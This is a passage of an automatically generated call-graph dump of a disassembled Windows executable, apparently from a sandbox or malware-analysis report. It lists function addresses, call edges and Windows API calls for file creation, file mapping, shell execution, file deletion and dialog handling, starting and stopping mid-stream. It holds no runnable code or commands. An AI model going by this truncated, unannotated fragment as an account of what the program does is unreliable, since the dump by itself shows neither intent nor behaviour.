109e63 LockResource 23697->23698 23698->23696 23699 109e77 GlobalAlloc 23698->23699 23699->23696 23700 109e92 GlobalLock 23699->23700 23701 109f21 GlobalFree 23700->23701 23702 109ea1 __vsnwprintf_l 23700->23702 23701->23696 23703 109ea9 CreateStreamOnHGlobal 23702->23703 23704 109ec1 23703->23704 23705 109f1a GlobalUnlock 23703->23705 23715 109d7b GdipAlloc 23704->23715 23705->23701 23708 109f05 23708->23705 23709 109eef GdipCreateHBITMAPFromBitmap 23709->23708 23710->23631 23711->23634 23712->23636 23713->23691 23714->23692 23716 109d9a 23715->23716 23717 109d8d 23715->23717 23716->23705 23716->23708 23716->23709 23719 109b0f 23717->23719 23720 109b30 GdipCreateBitmapFromStreamICM 23719->23720 23721 109b37 GdipCreateBitmapFromStream 23719->23721 23722 109b3c 23720->23722 23721->23722 23722->23716 23724 fd34b _wcschr __EH_prolog 23723->23724 23725 fd37a GetModuleFileNameW 23724->23725 23726 fd3ab 23724->23726 23727 fd394 23725->23727 23765 f99b0 23726->23765 23727->23726 23730 fd407 23776 115a90 26 API calls 3 library calls 23730->23776 23733 103781 76 API calls 23735 fd3db 23733->23735 23734 fd41a 23777 115a90 26 API calls 3 library calls 23734->23777 23735->23730 23735->23733 23748 fd627 23735->23748 23737 fd563 23737->23748 23802 f9d30 77 API calls 23737->23802 23741 fd57d ___std_exception_copy 23742 f9bf0 80 API calls 23741->23742 23741->23748 23745 fd5a6 ___std_exception_copy 23742->23745 23744 fd42c 23744->23737 23744->23748 23778 f9e40 23744->23778 23793 f9bf0 23744->23793 23801 f9d30 77 API calls 23744->23801 23747 fd5b2 ___std_exception_copy 23745->23747 23745->23748 23803 10137a MultiByteToWideChar 23745->23803 23747->23748 23749 fd72b 23747->23749 23751 fda0a 23747->23751 23754 fd9fa 23747->23754 23760 101596 WideCharToMultiByte 23747->23760 23807 fdd6b 50 API calls __vsnprintf 23747->23807 23808 1158d9 26 API calls 3 library calls 23747->23808 23786 f9653 23748->23786 23804 fce72 76 API calls 23749->23804 23809 fce72 76 API calls 23751->23809 23753 fd771 23805 115a90 26 API calls 3 library calls 23753->23805 23754->23639 23756 fd742 23756->23753 23758 103781 76 API calls 23756->23758 23757 fd78b 23806 115a90 26 API calls 3 library calls 23757->23806 23758->23756 23760->23747 23764 fd32f 23763->23764 23764->23642 23766 f99ba 23765->23766 23767 f9a39 CreateFileW 23766->23767 23768 f9aaa 23767->23768 23769 f9a59 GetLastError 23767->23769 23771 f9ae1 23768->23771 23773 f9ac7 SetFileTime 23768->23773 23770 fb66c 2 API calls 23769->23770 23772 f9a79 23770->23772 23771->23735 23772->23768 23774 f9a7d CreateFileW GetLastError 23772->23774 23773->23771 23775 f9aa1 23774->23775 23775->23768 23776->23734 23777->23744 23779 f9e64 SetFilePointer 23778->23779 23780 f9e53 23778->23780 23781 f9e9d 23779->23781 23782 f9e82 GetLastError 23779->23782 23780->23781 23810 f6fa5 75 API calls 23780->23810 23781->23744 23782->23781 23784 f9e8c 23782->23784 23784->23781 23811 f6fa5 75 API calls 23784->23811 23787 f9688 23786->23787 23788 f9677 23786->23788 23787->23639 23788->23787 23789 f968a 23788->23789 23790 f9683 23788->23790 23817 f96d0 23789->23817 23812 f9817 23790->23812 23795 f9bfc 23793->23795 23798 f9c03 23793->23798 23795->23744 23796 f9cc0 23796->23795 23800 f984e 5 API calls 23796->23800 23797 f9c9e 23797->23795 23844 f6f6b 75 API calls 23797->23844 23798->23795 23798->23796 23798->23797 23832 f984e 23798->23832 23800->23796 23801->23744 23802->23741 23803->23747 23804->23756 23805->23757 23806->23748 23807->23747 23808->23747 23809->23754 23810->23779 23811->23781 23813 f9824 23812->23813 23814 f9820 23812->23814 23813->23814 23823 fa12d 23813->23823 23814->23787 23818 f96fa 23817->23818 23819 f96dc 23817->23819 23820 f9719 23818->23820 23831 f6e3e 74 API calls 23818->23831 23819->23818 23821 f96e8 CloseHandle 23819->23821 23820->23787 23821->23818 23824 10e360 23823->23824 23825 fa13a DeleteFileW 23824->23825 23826 fa14d 23825->23826 23827 f984c 23825->23827 23828 fb66c 2 API calls 23826->23828 23827->23787 23829 fa161 23828->23829 23829->23827 23830 fa165 DeleteFileW 23829->23830 23830->23827 23831->23820 23833 f985c GetStdHandle 23832->23833 23834 f9867 ReadFile 23832->23834 23833->23834 23835 f9880 23834->23835 23841 f98a0 23834->23841 23845 f9989 23835->23845 23837 f9887 23838 f98a8 GetLastError 23837->23838 23839 f98b7 23837->23839 23840 f9895 23837->23840 23838->23839 23838->23841 23839->23841 23842 f98c7 GetLastError 23839->23842 23843 f984e GetFileType 23840->23843 23841->23798 23842->23840 23842->23841 23843->23841 23844->23795 23846 f998f 23845->23846 23847 f9992 GetFileType 23845->23847 23846->23837 23848 f99a0 23847->23848 23848->23837 23854 10e24f ___std_exception_copy 23849->23854 23850 108854 23850->23296 23854->23850 23855 1171ad 7 API calls 2 library calls 23854->23855 23856 10ecce RaiseException Concurrency::cancel_current_task new 23854->23856 23857 10ecb1 RaiseException Concurrency::cancel_current_task 23854->23857 23855->23854 23859 117430 _abort 23858->23859 23860 117448 23859->23860 23862 11757e _abort GetModuleHandleW 23859->23862 23880 11a3f1 EnterCriticalSection 23860->23880 23863 11743c 23862->23863 23863->23860 23892 1175c2 GetModuleHandleExW 23863->23892 23867 1174c5 23873 1181f1 _abort 5 API calls 23867->23873 23877 1174dd 23867->23877 23868 117450 23868->23867 23878 1174ee 23868->23878 23900 117f30 20 API calls _abort 23868->23900 23869 117537 23901 121a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23869->23901 23870 11750b 23884 11753d 23870->23884 23873->23877 23874 1181f1 _abort 5 API calls 23874->23878 23877->23874 23881 11752e 23878->23881 23880->23868 23902 11a441 LeaveCriticalSection 23881->23902 23883 117507 23883->23869 23883->23870 23903 11a836 23884->23903 23887 11756b 23890 1175c2 _abort 8 API calls 23887->23890 23888 11754b GetPEB 23888->23887 23889 11755b GetCurrentProcess TerminateProcess 23888->23889 23889->23887 23891 117573 ExitProcess 23890->23891 23893 1175ec GetProcAddress 23892->23893 23894 11760f 23892->23894 23895 117601 23893->23895 23896 117615 FreeLibrary 23894->23896 23897 11761e 23894->23897 23895->23894 23896->23897 23898 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23897->23898 23899 117628 23898->23899 23899->23860 23900->23867 23902->23883 23904 11a851 23903->23904 23905 11a85b 23903->23905 23907 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23904->23907 23906 11a458 __dosmaperr 5 API calls 23905->23906 23906->23904 23908 117547 23907->23908 23908->23887 23908->23888 24820 10eac0 27 API calls pre_c_initialization 24866 11ebc1 21 API calls __vsnwprintf_l 24867 1097c0 10 API calls 24822 119ec0 21 API calls 24868 11b5c0 GetCommandLineA GetCommandLineW 24823 10a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 23928 f10d5 23933 f5bd7 23928->23933 23934 f5be1 __EH_prolog 23933->23934 23940 fb07d 23934->23940 23936 f5bed 23946 f5dcc GetCurrentProcess GetProcessAffinityMask 23936->23946 23941 fb087 __EH_prolog 23940->23941 23947 fea80 80 API calls 23941->23947 23943 fb099 23948 fb195 23943->23948 23947->23943 23949 fb1a7 ___scrt_get_show_window_mode 23948->23949 23952 100948 23949->23952 23955 100908 GetCurrentProcess GetProcessAffinityMask 23952->23955 23956 fb10f 23955->23956 23956->23936 24873 10ebf7 20 API calls 23978 10e1f9 23979 10e203 23978->23979 23980 10df59 ___delayLoadHelper2@8 19 API calls 23979->23980 23981 10e210 23980->23981 24874 11abfd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23985 10aee0 23986 10aeea __EH_prolog 23985->23986 24148 f130b 23986->24148 23989 10b5cb 24213 10cd2e 23989->24213 23990 10af2c 23993 10afa2 23990->23993 23994 10af39 23990->23994 24055 10af18 23990->24055 23997 10b041 GetDlgItemTextW 23993->23997 24003 10afbc 23993->24003 23998 10af75 23994->23998 23999 10af3e 23994->23999 23995 10b5f7 24001 10b600 SendDlgItemMessageW 23995->24001 24002 10b611 GetDlgItem SendMessageW 23995->24002 23996 10b5e9 SendMessageW 23996->23995 23997->23998 24000 10b077 23997->24000 24004 10af96 KiUserCallbackDispatcher 23998->24004 23998->24055 24008 fddd1 53 API calls 23999->24008 23999->24055 24005 10b08f GetDlgItem 24000->24005 24145 10b080 24000->24145 24001->24002 24231 109da4 GetCurrentDirectoryW 24002->24231 24007 fddd1 53 API calls 24003->24007 24004->24055 24010 10b0a4 SendMessageW SendMessageW 24005->24010 24011 10b0c5 SetFocus 24005->24011 24012 10afde SetDlgItemTextW 24007->24012 24013 10af58 24008->24013 24009 10b641 GetDlgItem 24015 10b664 SetWindowTextW 24009->24015 24016 10b65e 24009->24016 24010->24011 24017 10b0d5 24011->24017 24028 10b0ed 24011->24028 24018 10afec 24012->24018 24253 f1241 SHGetMalloc 24013->24253 24232 10a2c7 GetClassNameW 24015->24232 24016->24015 24022 fddd1 53 API calls 24017->24022 24026 10aff9 GetMessageW 24018->24026 24018->24055 24019 10af5f 24023 10af63 SetDlgItemTextW 24019->24023 24019->24055 24020 10b56b 24024 fddd1 53 API calls 24020->24024 24027 10b0df 24022->24027 24023->24055 24029 10b57b SetDlgItemTextW 24024->24029 24031 10b010 IsDialogMessageW 24026->24031 24026->24055 24254 10cb5a 24027->24254 24036 fddd1 53 API calls 24028->24036 24033 10b58f 24029->24033 24031->24018 24035 10b01f TranslateMessage DispatchMessageW 24031->24035 24039 fddd1 53 API calls 24033->24039 24035->24018 24038 10b124 24036->24038 24037 10b6af 24041 10b6df 24037->24041 24046 fddd1 53 API calls 24037->24046 24042 f400a _swprintf 51 API calls 24038->24042 24043 10b5b8 24039->24043 24040 10bdf5 98 API calls 24040->24037 24054 10bdf5 98 API calls 24041->24054 24083 10b797 24041->24083 24047 10b136 24042->24047 24048 fddd1 53 API calls 24043->24048 24044 10b0e6 24158 fa04f 24044->24158 24052 10b6c2 SetDlgItemTextW 24046->24052 24053 10cb5a 16 API calls 24047->24053 24048->24055 24050 10b174 GetLastError 24051 10b17f 24050->24051 24164 10a322 SetCurrentDirectoryW 24051->24164 24060 fddd1 53 API calls 24052->24060 24053->24044 24061 10b6fa 24054->24061 24056 10b847 24057 10b850 EnableWindow 24056->24057 24058 10b859 24056->24058 24057->24058 24062 10b876 24058->24062 24272 f12c8 GetDlgItem EnableWindow 24058->24272 24064 10b6d6 SetDlgItemTextW 24060->24064 24070 10b70c 24061->24070 24084 10b731 24061->24084 24069 10b89d 24062->24069 24076 10b895 SendMessageW 24062->24076 24063 10b195 24067 10b1ac 24063->24067 24068 10b19e GetLastError 24063->24068 24064->24041 24066 10b78a 24072 10bdf5 98 API calls 24066->24072 24079 10b237 24067->24079 24081 10b1c4 GetTickCount 24067->24081 24125 10b227 24067->24125 24068->24067 24069->24055 24077 fddd1 53 API calls 24069->24077 24270 109635 32 API calls 24070->24270 24071 10b86c 24273 f12c8 GetDlgItem EnableWindow 24071->24273 24072->24083 24074 10b725 24074->24084 24076->24069 24078 10b8b6 SetDlgItemTextW 24077->24078 24078->24055 24086 10b407 24079->24086 24087 10b24f GetModuleFileNameW 24079->24087 24080 10b46c 24173 f12e6 GetDlgItem ShowWindow 24080->24173 24088 f400a _swprintf 51 API calls 24081->24088 24082 10b825 24271 109635 32 API calls 24082->24271 24083->24056 24083->24082 24090 fddd1 53 API calls 24083->24090 24084->24066 24091 10bdf5 98 API calls 24084->24091 24086->23998 24099 fddd1 53 API calls 24086->24099 24264 feb3a 80 API calls 24087->24264 24094 10b1dd 24088->24094 24090->24083 24096 10b75f 24091->24096 24092 10b47c 24174 f12e6 GetDlgItem ShowWindow 24092->24174 24165 f971e 24094->24165 24095 10b844 24095->24056 24096->24066 24100 10b768 DialogBoxParamW 24096->24100 24098 10b275 24102 f400a _swprintf 51 API calls 24098->24102 24103 10b41b 24099->24103 24100->23998 24100->24066 24101 10b486 24106 fddd1 53 API calls 24101->24106 24107 10b297 CreateFileMappingW 24102->24107 24104 f400a _swprintf 51 API calls 24103->24104 24112 10b439 24104->24112 24109 10b490 SetDlgItemTextW 24106->24109 24110 10b2f9 GetCommandLineW 24107->24110 24111 10b376 __vsnwprintf_l 24107->24111 24108 10b203 24113 10b215 24108->24113 24114 10b20a GetLastError 24108->24114 24175 f12e6 GetDlgItem ShowWindow 24109->24175 24118 10b30a 24110->24118 24115 10b381 ShellExecuteExW 24111->24115 24124 fddd1 53 API calls 24112->24124 24120 f9653 79 API calls 24113->24120 24114->24113 24138 10b39e 24115->24138 24117 10b4a2 SetDlgItemTextW GetDlgItem 24121 10b4d7 24117->24121 24122 10b4bf GetWindowLongW SetWindowLongW 24117->24122 24265 10ab2e SHGetMalloc 24118->24265 24120->24125 24176 10bdf5 24121->24176 24122->24121 24123 10b326 24266 10ab2e SHGetMalloc 24123->24266 24124->23998 24125->24079 24125->24080 24129 10b332 24267 10ab2e SHGetMalloc 24129->24267 24130 10b3e1 24130->24086 24137 10b3f7 UnmapViewOfFile CloseHandle 24130->24137 24131 10bdf5 98 API calls 24133 10b4f3 24131->24133 24201 10d0f5 24133->24201 24134 10b33e 24268 fecad 80 API calls ___scrt_get_show_window_mode 24134->24268 24137->24086 24138->24130 24141 10b3cd Sleep 24138->24141 24140 10b355 MapViewOfFile 24140->24111 24141->24130 24141->24138 24142 10bdf5 98 API calls 24146 10b519 24142->24146 24143 10b542 24269 f12c8 GetDlgItem EnableWindow 24143->24269 24145->23998 24145->24020 24146->24143 24147 10bdf5 98 API calls 24146->24147 24147->24143 24149 f136d 24148->24149 24150 f1314 24148->24150 24275 fda71 GetWindowLongW SetWindowLongW 24149->24275 24152 f137a 24150->24152 24274 fda98 62 API calls 2 library calls 24150->24274 24152->23989 24152->23990 24152->24055 24154 f1336 24154->24152 24155 f1349 GetDlgItem 24154->24155 24155->24152 24156 f1359 24155->24156 24156->24152 24157 f135f SetWindowTextW 24156->24157 24157->24152 24161 fa059 24158->24161 24159 fa0ea 24160 fa207 9 API calls 24159->24160 24162 fa113 24159->24162 24160->24162 24161->24159 24161->24162 24276 fa207 24161->24276 24162->24050 24162->24051 24164->24063 24166 f9728 24165->24166 24167 f9792 CreateFileW 24166->24167 24168 f9786 24166->24168 24167->24168 24169 f97e4 24168->24169 24170 fb66c 2 API calls 24168->24170 24169->24108 24171 f97cb 24170->24171 24171->24169 24172 f97cf CreateFileW 24171->24172 24172->24169 24173->24092 24174->24101 24175->24117 24177 10bdff __EH_prolog 24176->24177 24178 10b4e5 24177->24178 24179 10aa36 ExpandEnvironmentStringsW 24177->24179 24178->24131 24180 10be36 _wcsrchr 24179->24180 24180->24178 24182 10aa36 ExpandEnvironmentStringsW 24180->24182 24183 10c11d SetWindowTextW 24180->24183 24186 1135de 22 API calls 24180->24186 24188 10bf0b SetFileAttributesW 24180->24188 24193 10c2e7 GetDlgItem SetWindowTextW SendMessageW 24180->24193 24196 10c327 SendMessageW 24180->24196 24297 1017ac CompareStringW 24180->24297 24298 109da4 GetCurrentDirectoryW 24180->24298 24300 fa52a 7 API calls 24180->24300 24301 fa4b3 FindClose 24180->24301 24302 10ab9a 76 API calls ___std_exception_copy 24180->24302 24182->24180 24183->24180 24186->24180 24190 10bfc5 GetFileAttributesW 24188->24190 24200 10bf25 ___scrt_get_show_window_mode 24188->24200 24190->24180 24191 10bfd7 DeleteFileW 24190->24191 24191->24180 24194 10bfe8 24191->24194 24193->24180 24195 f400a _swprintf 51 API calls 24194->24195 24197 10c008 GetFileAttributesW 24195->24197 24196->24180 24197->24194 24198 10c01d MoveFileW 24197->24198 24198->24180 24199 10c035 MoveFileExW 24198->24199 24199->24180 24200->24180 24200->24190 24299 fb4f7 52 API calls 2 library calls 24200->24299 24202 10d0ff __EH_prolog 24201->24202 24303 ffead 24202->24303 24204 10d130 24307 f5c59 24204->24307 24206 10d14e 24311 f7c68 24206->24311 24210 10d1a1 24328 f7cfb 24210->24328 24212 10b504 24212->24142 24214 10cd38 24213->24214 24215 109d1a 4 API calls 24214->24215 24216 10cd3d 24215->24216 24217 10cd45 GetWindow 24216->24217 24218 10b5d1 24216->24218 24217->24218 24221 10cd65 24217->24221 24218->23995 24218->23996 24219 10cd72 GetClassNameW 24762 1017ac CompareStringW 24219->24762 24221->24218 24221->24219 24222 10cd96 GetWindowLongW 24221->24222 24223 10cdfa GetWindow 24221->24223 24222->24223 24224 10cda6 SendMessageW 24222->24224 24223->24218 24223->24221 24224->24223 24225 10cdbc GetObjectW 24224->24225 24763 109d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24225->24763 24227 10cdd3 24764 109d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24227->24764 24765 109f5d 8 API calls ___scrt_get_show_window_mode 24227->24765 24230 10cde4 SendMessageW DeleteObject 24230->24223 24231->24009 24233 10a2e8 24232->24233 24234 10a30d 24232->24234 24766 1017ac CompareStringW 24233->24766 24236 10a312 SHAutoComplete 24234->24236 24237 10a31b 24234->24237 24236->24237 24240 10a7c3 24237->24240 24238 10a2fb 24238->24234 24239 10a2ff FindWindowExW 24238->24239 24239->24234 24241 10a7cd __EH_prolog 24240->24241 24242 f1380 82 API calls 24241->24242 24243 10a7ef 24242->24243 24767 f1f4f 24243->24767 24246 10a818 24249 f1951 126 API calls 24246->24249 24247 10a809 24248 f1631 84 API calls 24247->24248 24250 10a814 24248->24250 24252 10a83a __vsnwprintf_l ___std_exception_copy 24249->24252 24250->24037 24250->24040 24251 f1631 84 API calls 24251->24250 24252->24250 24252->24251 24253->24019 24255 10ac74 5 API calls 24254->24255 24256 10cb66 GetDlgItem 24255->24256 24257 10cb88 24256->24257 24258 10cbbc SendMessageW SendMessageW 24256->24258 24263 10cb93 ShowWindow SendMessageW SendMessageW 24257->24263 24259 10cc17 SendMessageW SendMessageW SendMessageW 24258->24259 24260 10cbf8 24258->24260 24261 10cc4a SendMessageW 24259->24261 24262 10cc6d SendMessageW 24259->24262 24260->24259 24261->24262 24262->24044 24263->24258 24264->24098 24265->24123 24266->24129 24267->24134 24268->24140 24269->24145 24270->24074 24271->24095 24272->24071 24273->24062 24274->24154 24275->24152 24277 fa214 24276->24277 24278 fa238 24277->24278 24279 fa22b CreateDirectoryW 24277->24279 24280 fa180 4 API calls 24278->24280 24279->24278 24282 fa26b 24279->24282 24281 fa23e 24280->24281 24283 fa27e GetLastError 24281->24283 24284 fb66c 2 API calls 24281->24284 24286 fa27a 24282->24286 24289 fa444 24282->24289 24283->24286 24287 fa254 24284->24287 24286->24161 24287->24283 24288 fa258 CreateDirectoryW 24287->24288 24288->24282 24288->24283 24290 10e360 24289->24290 24291 fa451 SetFileAttributesW 24290->24291 24292 fa467 24291->24292 24293 fa494 24291->24293 24294 fb66c 2 API calls 24292->24294 24293->24286 24295 fa47b 24294->24295 24295->24293 24296 fa47f SetFileAttributesW 24295->24296 24296->24293 24297->24180 24298->24180 24299->24200 24300->24180 24301->24180 24302->24180 24304 ffeba 24303->24304 24332 f1789 24304->24332 24306 ffed2 24306->24204 24308 ffead 24307->24308 24309 f1789 76 API calls 24308->24309 24310 ffed2 24309->24310 24310->24206 24312 f7c72 __EH_prolog 24311->24312 24349 fc827 24312->24349 24314 f7c8d 24315 10e24a new 8 API calls 24314->24315 24316 f7cb7 24315->24316 24355 10440b 24316->24355 24319 f7ddf 24320 f7de9 24319->24320 24322 f7e53 24320->24322 24384 fa4c6 24320->24384 24324 f7ec4 24322->24324 24327 fa4c6 8 API calls 24322->24327 24362 f837f 24322->24362 24323 f7f06 24323->24210 24324->24323 24390 f6dc1 74 API calls 24324->24390 24327->24322 24329 f7d09 24328->24329 24331 f7d10 24328->24331 24330 101acf 84 API calls 24329->24330 24330->24331 24333 f179f 24332->24333 24344 f17fa __vsnwprintf_l 24332->24344 24334 f17c8 24333->24334 24345 f6e91 74 API calls __vswprintf_c_l 24333->24345 24336 f1827 24334->24336 24341 f17e7 ___std_exception_copy 24334->24341 24338 1135de 22 API calls 24336->24338 24337 f17be 24346 f6efd 75 API calls 24337->24346 24340 f182e 24338->24340 24340->24344 24348 f6efd 75 API calls 24340->24348 24341->24344 24347 f6efd 75 API calls 24341->24347 24344->24306 24345->24337 24346->24334 24347->24344 24348->24344 24350 fc831 __EH_prolog 24349->24350 24351 10e24a new 8 API calls 24350->24351 24352 fc874 24351->24352 24353 10e24a new 8 API calls 24352->24353 24354 fc898 24353->24354 24354->24314 24356 104415 __EH_prolog 24355->24356 24357 10e24a new 8 API calls 24356->24357 24358 104431 24357->24358 24359 f7ce6 24358->24359 24361 1006ba 78 API calls 24358->24361 24359->24319 24361->24359 24363 f8389 __EH_prolog 24362->24363 24391 f1380 24363->24391 24365 f83a4 24399 f9ef7 24365->24399 24371 f83d3 24519 f1631 24371->24519 24372 f83cf 24372->24371 24380 fa4c6 8 API calls 24372->24380 24383 f846e 24372->24383 24523 fbac4 CompareStringW 24372->24523 24375 f84ce 24422 f1f00 24375->24422 24380->24372 24381 f84d9 24381->24371 24426 f3aac 24381->24426 24436 f857b 24381->24436 24418 f8517 24383->24418 24385 fa4db 24384->24385 24386 fa4df 24385->24386 24750 fa5f4 24385->24750 24386->24320 24388 fa4ef 24388->24386 24389 fa4f4 FindClose 24388->24389 24389->24386 24390->24323 24392 f1385 __EH_prolog 24391->24392 24393 fc827 8 API calls 24392->24393 24394 f13bd 24393->24394 24395 10e24a new 8 API calls 24394->24395 24398 f1416 ___scrt_get_show_window_mode 24394->24398 24396 f1403 24395->24396 24397 fb07d 82 API calls 24396->24397 24396->24398 24397->24398 24398->24365 24400 f9f0e 24399->24400 24401 f83ba 24400->24401 24525 f6f5d 76 API calls 24400->24525 24401->24371 24403 f19a6 24401->24403 24404 f19b0 __EH_prolog 24403->24404 24414 f1a00 24404->24414 24417 f19e5 24404->24417 24526 f709d 24404->24526 24406 f1b50 24529 f6dc1 74 API calls 24406->24529 24408 f3aac 97 API calls 24412 f1bb3 24408->24412 24409 f1b60 24409->24408 24409->24417 24410 f1bff 24416 f1c32 24410->24416 24410->24417 24530 f6dc1 74 API calls 24410->24530 24412->24410 24413 f3aac 97 API calls 24412->24413 24413->24412 24414->24406 24414->24409 24414->24417 24415 f3aac 97 API calls 24415->24416 24416->24415 24416->24417 24417->24372 24419 f8524 24418->24419 24548 100c26 GetSystemTime SystemTimeToFileTime 24419->24548 24421 f8488 24421->24375 24524 101359 72 API calls 24421->24524 24423 f1f05 __EH_prolog 24422->24423 24424 f1f39 24423->24424 24550 f1951 24423->24550 24424->24381 24427 f3abc 24426->24427 24428 f3ab8 24426->24428 24429 f3ae9 24427->24429 24430 f3af7 24427->24430 24428->24381 24431 f3b29 24429->24431 24684 f3281 85 API calls 3 library calls 24429->24684 24685 f27e8 97 API calls 3 library calls 24430->24685 24431->24381 24434 f3af5 24434->24431 24686 f204e 74 API calls 24434->24686 24437 f8585 __EH_prolog 24436->24437 24438 f85be 24437->24438 24446 f85c2 24437->24446 24709 1084bd 99 API calls 24437->24709 24439 f85e7 24438->24439 24442 f867a 24438->24442 24438->24446 24440 f8609 24439->24440 24439->24446 24710 f7b66 151 API calls 24439->24710 24440->24446 24711 1084bd 99 API calls 24440->24711 24442->24446 24687 f5e3a 24442->24687 24446->24381 24447 f8705 24447->24446 24693 f826a 24447->24693 24449 f8875 24451 fa4c6 8 API calls 24449->24451 24452 f88e0 24449->24452 24451->24452 24697 f7d6c 24452->24697 24454 fc991 80 API calls 24458 f893b _memcmp 24454->24458 24455 f8a70 24456 f8b43 24455->24456 24463 f8abf 24455->24463 24461 f8b9e 24456->24461 24473 f8b4e 24456->24473 24457 f8a69 24714 f1f94 74 API calls 24457->24714 24458->24446 24458->24454 24458->24455 24458->24457 24712 f8236 82 API calls 24458->24712 24713 f1f94 74 API calls 24458->24713 24471 f8b30 24461->24471 24717 f80ea 96 API calls 24461->24717 24462 f8b9c 24465 f9653 79 API calls 24462->24465 24466 fa180 4 API calls 24463->24466 24463->24471 24464 f9653 79 API calls 24464->24446 24465->24446 24470 f8af7 24466->24470 24468 f8c74 24474 faa88 8 API calls 24468->24474 24469 f8c09 24469->24468 24472 f9989 GetFileType 24469->24472 24509 f91c1 ___InternalCxxFrameHandler 24469->24509 24470->24471 24715 f9377 96 API calls 24470->24715 24471->24462 24471->24469 24475 f8c4c 24472->24475 24473->24462 24716 f7f26 100 API calls ___InternalCxxFrameHandler 24473->24716 24477 f8cc3 24474->24477 24475->24468 24718 f1f94 74 API calls 24475->24718 24479 faa88 8 API calls 24477->24479 24483 f8cd9 24479->24483 24481 f8c62 24719 f7061 75 API calls 24481->24719 24484 f8d9c 24483->24484 24720 f9b21 SetFilePointer GetLastError SetEndOfFile 24483->24720 24485 f8efd 24484->24485 24486 f8df7 24484->24486 24487 f8e27 24485->24487 24489 f8f0f 24485->24489 24490 f8f23 24485->24490 24488 f8e69 24486->24488 24492 f8e07 24486->24492 24512 f904b 24487->24512 24726 f1f94 74 API calls 24487->24726 24491 f826a CharUpperW 24488->24491 24495 f92e6 121 API calls 24489->24495 24496 102c42 75 API calls 24490->24496 24493 f8e84 24491->24493 24494 f8e4d 24492->24494 24499 f8e15 24492->24499 24493->24487 24502 f8ead 24493->24502 24503 f8eb4 24493->24503 24494->24487 24722 f7907 108 API calls 24494->24722 24495->24487 24498 f8f3c 24496->24498 24725 1028f1 121 API calls 24498->24725 24721 f1f94 74 API calls 24499->24721 24723 f7698 84 API calls ___InternalCxxFrameHandler 24502->24723 24724 f9224 94 API calls __EH_prolog 24503->24724 24508 f9156 24508->24509 24511 fa444 4 API calls 24508->24511 24509->24464 24510 f9104 24704 f9d62 24510->24704 24513 f91b1 24511->24513 24512->24508 24512->24509 24512->24510 24703 f9ebf SetEndOfFile 24512->24703 24513->24509 24727 f1f94 74 API calls 24513->24727 24516 f914b 24517 f96d0 75 API calls 24516->24517 24517->24508 24520 f1643 24519->24520 24742 fc8ca 24520->24742 24523->24372 24524->24375 24525->24401 24531 f16d2 24526->24531 24528 f70b9 24528->24414 24529->24417 24530->24416 24532 f16e8 24531->24532 24543 f1740 __vsnwprintf_l 24531->24543 24533 f1711 24532->24533 24544 f6e91 74 API calls __vswprintf_c_l 24532->24544 24535 f1767 24533->24535 24540 f172d ___std_exception_copy 24533->24540 24537 1135de 22 API calls 24535->24537 24536 f1707 24545 f6efd 75 API calls 24536->24545 24539 f176e 24537->24539 24539->24543 24547 f6efd 75 API calls 24539->24547 24540->24543 24546 f6efd 75 API calls 24540->24546 24543->24528 24544->24536 24545->24533 24546->24543 24547->24543 24549 100c56 __vsnwprintf_l 24548->24549 24549->24421 24551 f195d 24550->24551 24552 f1961 24550->24552 24551->24424 24554 f1896 24552->24554 24555 f18a8 24554->24555 24556 f18e5 24554->24556 24557 f3aac 97 API calls 24555->24557 24562 f3f18 24556->24562 24558 f18c8 24557->24558 24558->24551 24566 f3f21 24562->24566 24563 f3aac 97 API calls 24563->24566 24564 f1906 24564->24558 24567 f1e00 24564->24567 24566->24563 24566->24564 24579 10067c 24566->24579 24568 f1e0a __EH_prolog 24567->24568 24587 f3b3d 24568->24587 24570 f1e34 24571 f16d2 76 API calls 24570->24571 24573 f1ebb 24570->24573 24572 f1e4b 24571->24572 24615 f1849 76 API calls 24572->24615 24573->24558 24575 f1e63 24577 f1e6f 24575->24577 24616 10137a MultiByteToWideChar 24575->24616 24617 f1849 76 API calls 24577->24617 24580 100683 24579->24580 24581 10069e 24580->24581 24585 f6e8c RaiseException Concurrency::cancel_current_task 24580->24585 24583 1006af SetThreadExecutionState 24581->24583 24586 f6e8c RaiseException Concurrency::cancel_current_task 24581->24586 24583->24566 24585->24581 24586->24583 24588 f3b47 __EH_prolog 24587->24588 24589 f3b5d 24588->24589 24590 f3b79 24588->24590 24646 f6dc1 74 API calls 24589->24646 24591 f3dc2 24590->24591 24595 f3ba5 24590->24595 24663 f6dc1 74 API calls 24591->24663 24594 f3b68 24594->24570 24595->24594 24618 102c42 24595->24618 24597 f3c26 24598 f3cb1 24597->24598 24614 f3c1d 24597->24614 24649 fc991 24597->24649 24631 faa88 24598->24631 24599 f3c22 24599->24597 24648 f2034 76 API calls 24599->24648 24600 f3bf4 24600->24597 24600->24599 24601 f3c12 24600->24601 24647 f6dc1 74 API calls 24601->24647 24603 f3cc4 24608 f3d3e 24603->24608 24609 f3d48 24603->24609 24635 f92e6 24608->24635 24655 1028f1 121 API calls 24609->24655 24612 f3d46 24612->24614 24656 f1f94 74 API calls 24612->24656 24657 101acf 24614->24657 24615->24575 24616->24577 24617->24573 24619 102c51 24618->24619 24621 102c5b 24618->24621 24664 f6efd 75 API calls 24619->24664 24623 102ca2 ___std_exception_copy 24621->24623 24624 102c9d Concurrency::cancel_current_task 24621->24624 24630 102cfd ___scrt_get_show_window_mode 24621->24630 24622 102da9 Concurrency::cancel_current_task 24667 11157a RaiseException 24622->24667 24623->24622 24625 102cd9 24623->24625 24623->24630 24666 11157a RaiseException 24624->24666 24665 102b7b 75 API calls 3 library calls 24625->24665 24629 102dc1 24630->24600 24632 faa95 24631->24632 24634 faa9f 24631->24634 24633 10e24a new 8 API calls 24632->24633 24633->24634 24634->24603 24636 f92f0 __EH_prolog 24635->24636 24668 f7dc6 24636->24668 24639 f709d 76 API calls 24640 f9302 24639->24640 24671 fca6c 24640->24671 24642 f935c 24642->24612 24644 fca6c 114 API calls 24645 f9314 24644->24645 24645->24642 24645->24644 24680 fcc51 97 API calls __vsnwprintf_l 24645->24680 24646->24594 24647->24614 24648->24597 24650 fc9c4 24649->24650 24651 fc9b2 24649->24651 24682 f6249 80 